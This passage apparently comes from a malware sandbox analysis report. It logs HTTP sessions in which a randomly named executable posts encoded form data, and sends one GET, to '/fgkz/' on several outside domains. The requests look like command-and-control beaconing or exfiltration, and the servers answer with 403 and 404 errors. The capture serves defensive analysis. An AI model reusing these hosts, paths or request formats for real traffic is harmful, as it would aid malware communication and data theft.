                                Aug 30, 2024 07:19:13.142545938 CEST360INData Raw: 74 68 65 72 61 6e 63 68 6f 62 69 7a 61 72 72 6f 2e 63 6f 6d 2f 62 75 69 6c 64 2f 6a 73 2f 63 6f 6d 70 69 6c 65 64 2f 62 61 63 6b 65 6e 64 2f 61 70 70 2d 35 36 63 65 61 36 31 35 61 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 21 2d 2d 70
                                Data Ascii: theranchobizarro.com/build/js/compiled/backend/app-56cea615a1.js"></script>...prism-->...scrollbar-->...plugins.js - Some Specific JS codes for Plugin Settings-->... lazyload -->... Typeahead --> <script src="http://www.ther


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.54972791.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:26.991449118 CEST624OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sciencebot.sbs
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sciencebot.sbs
                                Referer: http://www.sciencebot.sbs/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 4a 75 64 4e 2f 5a 36 4b 2b 73 70 66 52 79 68 74 6f 52 5a 50 6b 44 63 4a 2f 4c 51 59 39 6d 2f 6b 6d 59 72 4a 55 55 68 61 45 74 75 69 32 36 2b 41 66 62 70 47 65 76 65 69 47 43 51 61 48 72 32 77 62 52 4a 79 4c 48 67 33 47 4a 6e 6d 47 43 41 47 78 33 61 51 4b 4d 68 2f 54 62 4e 66 54 45 76 72 6b 6b 41 30 45 42 49 50 76 4e 49 66 56 6f 70 77 39 56 61 62 69 6c 51 79 74 54 78 6f 68 31 54 70 67 49 42 2f 47 31 65 78 6d 4f 45 6e 4e 6d 33 42 33 52 64 32 53 50 48 6f 79 6c 69 4e 6f 57 4e 6b 77 37 4f 7a 53 76 54 58 51 32 6c 6d 7a 75 37 43 77 51 3d 3d
                                Data Ascii: 4f2t8=JudN/Z6K+spfRyhtoRZPkDcJ/LQY9m/kmYrJUUhaEtui26+AfbpGeveiGCQaHr2wbRJyLHg3GJnmGCAGx3aQKMh/TbNfTEvrkkA0EBIPvNIfVopw9VabilQytTxoh1TpgIB/G1exmOEnNm3B3Rd2SPHoyliNoWNkw7OzSvTXQ2lmzu7CwQ==
                                Aug 30, 2024 07:19:27.634120941 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.54972891.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:29.513371944 CEST644OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sciencebot.sbs
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sciencebot.sbs
                                Referer: http://www.sciencebot.sbs/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 4a 75 64 4e 2f 5a 36 4b 2b 73 70 66 51 54 52 74 37 47 31 50 73 44 63 4b 36 4c 51 59 33 47 2f 6f 6d 59 6e 4a 55 51 35 73 45 65 4b 69 31 61 4f 41 4e 4a 42 47 4e 66 65 69 4f 69 51 62 4e 4c 32 75 62 52 4e 36 4c 46 30 33 47 4a 62 6d 47 43 51 47 79 45 79 66 4c 63 68 39 5a 4c 4e 6e 64 6b 76 72 6b 6b 41 30 45 42 63 31 76 4e 41 66 57 59 5a 77 36 45 61 63 38 31 51 74 36 6a 78 6f 72 6c 54 74 67 49 42 6e 47 77 47 62 6d 4d 4d 6e 4e 69 7a 42 30 41 64 33 4c 66 48 75 2f 46 6a 66 6c 55 59 7a 37 64 61 7a 54 71 58 58 41 53 4e 34 2f 62 58 52 33 76 49 32 32 31 69 70 51 49 70 41 4b 4e 2f 57 68 4b 75 47 6c 42 6b 3d
                                Data Ascii: 4f2t8=JudN/Z6K+spfQTRt7G1PsDcK6LQY3G/omYnJUQ5sEeKi1aOANJBGNfeiOiQbNL2ubRN6LF03GJbmGCQGyEyfLch9ZLNndkvrkkA0EBc1vNAfWYZw6Eac81Qt6jxorlTtgIBnGwGbmMMnNizB0Ad3LfHu/FjflUYz7dazTqXXASN4/bXR3vI221ipQIpAKN/WhKuGlBk=
                                Aug 30, 2024 07:19:30.156521082 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.54972991.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:32.044250965 CEST1657OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sciencebot.sbs
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sciencebot.sbs
                                Referer: http://www.sciencebot.sbs/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 4a 75 64 4e 2f 5a 36 4b 2b 73 70 66 51 54 52 74 37 47 31 50 73 44 63 4b 36 4c 51 59 33 47 2f 6f 6d 59 6e 4a 55 51 35 73 45 65 43 69 31 72 75 41 66 34 42 47 4f 66 65 69 41 43 51 65 4e 4c 33 72 62 52 31 2b 4c 46 6f 34 47 4d 58 6d 48 6b 63 47 33 31 79 66 65 4d 68 39 52 72 4e 63 54 45 75 6a 6b 6b 77 77 45 42 4d 31 76 4e 41 66 57 65 31 77 73 46 61 63 2b 31 51 79 74 54 78 6b 68 31 54 42 67 49 70 64 47 77 4b 68 6c 34 34 6e 4f 47 58 42 79 7a 31 33 44 66 48 57 2b 46 69 61 6c 55 46 30 37 5a 36 46 54 71 4b 79 41 56 68 34 2f 64 4f 35 30 50 4d 2f 69 47 53 5a 64 4c 31 62 4c 59 62 62 2b 72 43 64 37 45 71 4b 36 32 45 50 79 71 4c 56 58 4d 37 37 34 5a 41 59 55 6d 72 37 79 68 4e 55 31 63 66 6f 6a 2b 56 58 2b 45 69 49 37 68 45 4d 65 50 2b 4f 41 7a 34 68 74 4f 6d 37 64 70 76 54 4c 73 54 71 67 6a 48 54 68 42 7a 52 44 59 2f 74 49 67 55 49 6f 6e 4d 4c 7a 46 59 6e 61 44 78 59 63 34 63 78 63 64 47 4b 39 38 33 39 4f 6c 61 6d 4e 66 46 42 6a 6e 30 37 2f 70 6c 76 76 31 62 55 63 52 59 66 42 4e 55 74 73 4e 66 6d [TRUNCATED]
                                Data Ascii: 4f2t8=JudN/Z6K+spfQTRt7G1PsDcK6LQY3G/omYnJUQ5sEeCi1ruAf4BGOfeiACQeNL3rbR1+LFo4GMXmHkcG31yfeMh9RrNcTEujkkwwEBM1vNAfWe1wsFac+1QytTxkh1TBgIpdGwKhl44nOGXByz13DfHW+FialUF07Z6FTqKyAVh4/dO50PM/iGSZdL1bLYbb+rCd7EqK62EPyqLVXM774ZAYUmr7yhNU1cfoj+VX+EiI7hEMeP+OAz4htOm7dpvTLsTqgjHThBzRDY/tIgUIonMLzFYnaDxYc4cxcdGK9839OlamNfFBjn07/plvv1bUcRYfBNUtsNfmMsfNVkfQGtFQuGSzyl49DEKyAhf6VnksziG6NkCFkKILl678j/bmRE14Q/GbUpoN9hxje2gK3VSW5/eDSYlVdHLaA2/holz8VQWKcRGqu1vOPq5z61RAeiOve0HljQB7Tsq5hw4gvZdxLvoPOyTtMedGTEVoms+oRXreJ7f62Qng+cjP74cbajdIqeh2yF1Ft6gqu+Qg3Oa3cWLvLJ9Xi/41FzM/Ot18gHWhAQqzcWGEyuB66KlgxE1iIgogGfda3mhck+/cgD9JM/9dZzKDs45eTyf4WgQvZj6bkfGEcD6cRbnmm4d8ke0KofEwKsKJKZWn0hl4L7rbMMWb6GPN6zTmv6XMzy6jXgqH1Y+XPH8O+XyF9o/dvBLpf8NQwkkFJyyJqoxA2GCivTewPYwL5x1EAAcvBL222E0fIiw2XVII8E5DkB0CDjT99I5kYIkQewCee+K8T1s+6evE1Hg/5DOpoB5GAxzP6yklI6Pu/LTTX02FqwvMcrFiLuAi4oH10mskjcqL/k7vAlhrtk9g/HUOuJ7VahdHuOkJcAi16beU8z6roGVrUdPffPIxCShoBm0+1Md4C29+M2UMSwcQkWEX13h4kxh3g9ViELyXSQXux2uIoJbAwZNeN9qUxgTakJBl7sUiZjhcsZf1QWKrKy0/0OV7wEqYrZ [TRUNCATED]
                                Aug 30, 2024 07:19:32.725709915 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.54973091.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:34.579659939 CEST348OUTGET /fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.sciencebot.sbs
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:35.230638981 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.549731119.18.54.85805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:41.188098907 CEST633OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.gpcamservices.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.gpcamservices.com
                                Referer: http://www.gpcamservices.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 2f 36 74 42 50 55 73 78 48 78 76 32 41 44 2b 42 49 46 4a 6e 7a 47 38 33 7a 77 6a 4e 34 43 46 6a 78 6f 68 71 43 70 4b 64 43 48 4b 46 6b 38 6a 70 36 65 6e 4f 6e 6f 77 43 45 42 7a 69 2b 7a 6d 65 78 6a 4e 54 6f 57 6f 64 58 76 33 43 32 61 4d 35 44 63 46 42 7a 7a 53 70 61 65 39 36 45 44 32 56 44 49 78 64 39 38 52 55 43 46 77 61 45 55 35 41 43 76 66 42 56 7a 35 79 50 76 6a 4c 67 4b 6f 75 4e 44 4f 53 30 32 46 79 34 59 51 46 48 6a 48 7a 74 63 49 66 76 5a 78 39 6c 45 51 64 2b 62 66 38 37 64 73 74 46 6f 61 62 2f 45 4f 6f 32 4b 4d 31 46 67 3d 3d
                                Data Ascii: 4f2t8=/6tBPUsxHxv2AD+BIFJnzG83zwjN4CFjxohqCpKdCHKFk8jp6enOnowCEBzi+zmexjNToWodXv3C2aM5DcFBzzSpae96ED2VDIxd98RUCFwaEU5ACvfBVz5yPvjLgKouNDOS02Fy4YQFHjHztcIfvZx9lEQd+bf87dstFoab/EOo2KM1Fg==
                                Aug 30, 2024 07:19:42.210309029 CEST643INHTTP/1.1 404 Not Found
                                Date: Fri, 30 Aug 2024 05:19:42 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 358
                                Content-Type: text/html
                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.549732119.18.54.85805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:43.774899960 CEST653OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.gpcamservices.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.gpcamservices.com
                                Referer: http://www.gpcamservices.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 2f 36 74 42 50 55 73 78 48 78 76 32 42 67 6d 42 4b 69 64 6e 37 47 38 34 71 77 6a 4e 79 69 46 6e 78 6f 39 71 43 73 72 47 43 31 65 46 6c 65 72 70 6f 72 48 4f 67 6f 77 43 4d 68 7a 6e 7a 54 6d 56 78 6a 52 62 6f 54 49 64 58 76 6a 43 32 62 38 35 44 76 74 41 7a 6a 53 76 47 65 39 34 4b 6a 32 56 44 49 78 64 39 38 46 71 43 46 6f 61 45 6b 4a 41 44 4c 4c 4f 66 54 35 78 4d 76 6a 4c 72 71 70 6e 4e 44 4f 4b 30 33 70 4d 34 65 55 46 48 69 33 7a 71 4e 49 65 6d 5a 78 37 71 6b 52 79 34 34 47 48 38 50 55 45 45 62 66 77 75 48 58 30 2b 2f 67 6d 43 64 69 79 75 37 74 74 6b 42 5a 6d 6c 52 44 37 4c 6c 6c 77 38 7a 55 3d
                                Data Ascii: 4f2t8=/6tBPUsxHxv2BgmBKidn7G84qwjNyiFnxo9qCsrGC1eFlerporHOgowCMhznzTmVxjRboTIdXvjC2b85DvtAzjSvGe94Kj2VDIxd98FqCFoaEkJADLLOfT5xMvjLrqpnNDOK03pM4eUFHi3zqNIemZx7qkRy44GH8PUEEbfwuHX0+/gmCdiyu7ttkBZmlRD7Lllw8zU=
                                Aug 30, 2024 07:19:44.888045073 CEST643INHTTP/1.1 404 Not Found
                                Date: Fri, 30 Aug 2024 05:19:44 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 358
                                Content-Type: text/html
                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.549733119.18.54.85805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:46.338232994 CEST1666OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.gpcamservices.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.gpcamservices.com
                                Referer: http://www.gpcamservices.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 2f 36 74 42 50 55 73 78 48 78 76 32 42 67 6d 42 4b 69 64 6e 37 47 38 34 71 77 6a 4e 79 69 46 6e 78 6f 39 71 43 73 72 47 43 30 6d 46 6b 73 54 70 35 39 50 4f 68 6f 77 43 47 42 7a 6d 7a 54 6d 79 78 6a 5a 66 6f 54 45 33 58 73 62 43 33 35 45 35 4b 2b 74 41 38 6a 53 76 4e 2b 39 35 45 44 32 36 44 49 42 5a 39 38 56 71 43 46 6f 61 45 6e 42 41 45 66 66 4f 5a 54 35 79 50 76 6a 48 67 4b 70 50 4e 44 47 30 30 33 63 35 37 74 63 46 43 79 6e 7a 6f 2f 51 65 36 4a 78 35 70 6b 52 71 34 34 36 59 38 4c 38 6d 45 59 43 64 75 41 6a 30 39 62 70 73 64 63 4f 36 7a 49 74 64 71 54 6c 79 78 58 2f 43 52 51 70 46 71 7a 79 4f 5a 6a 38 64 53 2f 6a 6d 69 61 59 56 68 31 4d 58 4f 4d 33 77 74 52 6d 61 62 78 49 62 64 6a 6f 6b 46 46 31 31 68 70 53 78 52 35 4e 37 2f 62 68 39 53 53 76 31 57 74 46 58 71 58 43 54 6f 6b 77 6d 73 59 4e 65 67 4e 6f 2f 6c 58 30 76 6e 4a 6f 57 67 56 49 54 56 32 62 4b 52 30 64 7a 30 37 75 6e 50 5a 31 4e 73 38 39 41 6d 30 72 32 72 4a 65 33 2b 55 5a 53 6b 64 64 49 42 77 37 63 36 73 2b 71 68 43 6e 6f [TRUNCATED]
                                Data Ascii: 4f2t8=/6tBPUsxHxv2BgmBKidn7G84qwjNyiFnxo9qCsrGC0mFksTp59POhowCGBzmzTmyxjZfoTE3XsbC35E5K+tA8jSvN+95ED26DIBZ98VqCFoaEnBAEffOZT5yPvjHgKpPNDG003c57tcFCynzo/Qe6Jx5pkRq446Y8L8mEYCduAj09bpsdcO6zItdqTlyxX/CRQpFqzyOZj8dS/jmiaYVh1MXOM3wtRmabxIbdjokFF11hpSxR5N7/bh9SSv1WtFXqXCTokwmsYNegNo/lX0vnJoWgVITV2bKR0dz07unPZ1Ns89Am0r2rJe3+UZSkddIBw7c6s+qhCnocSIH0wg4OR1eaM8jxriiofN4WG/Cap+B/TLf5S3zrCx+pAdPg7fu5p+h4mkm/fBHf+ASlrxjL2nQp9m8SofFeFoy5DuTAOzFuLPKPA21pEJCfTSpRC02RE2F2i0MVTYZiYcPh8uH/bDPcSWUiCMVL5OpG95isgTKEc/CcR2SzBbN85QQkCufAGXJvoNfgTAX+d94k9BbOAOtVuR+4v7RSMaH9hh5aMiFbYa3+L1ZbKEBWeaHCF3pYykuhIPRj33OciNUjgk7FCgy0a2s3P/USchhpatSX5w8LiBGEd1xcUBLj8cnQpbA5/pNzbhKulXcEW0AwB0mveMEepHKLQeCvnEs34p52hJM6BIl9CyhTq5AZtBe2KqmiarmGHRJpexcQkk7gFSTOc9R6X3gXO3G2MAgxDo1/q+4XLEjWWfklpLmh/CPTXv0CCbZZybEoI5gzre9u7lRunoEPfTXG4WugoIrGnsZqQRGZGY9cfruaVoWh5gY88if1lb5shVnosuoRqu+18b/Z2FRk2MNdVWxXb7ehYxhJLKpebrAZ/Tt0eaTXAatpQa7YrlRBSABIUsM4of0O5L+hbqMUkhStlc05J2kB27a64ig4sytQP+ojRCcNADKG0DoThjwMFxf5gNjf8LjKxPvfYPJzzHsEFxHqsLM3qSNHxSUVk [TRUNCATED]
                                Aug 30, 2024 07:19:47.329751968 CEST643INHTTP/1.1 404 Not Found
                                Date: Fri, 30 Aug 2024 05:19:47 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 358
                                Content-Type: text/html
                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.549734119.18.54.85805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
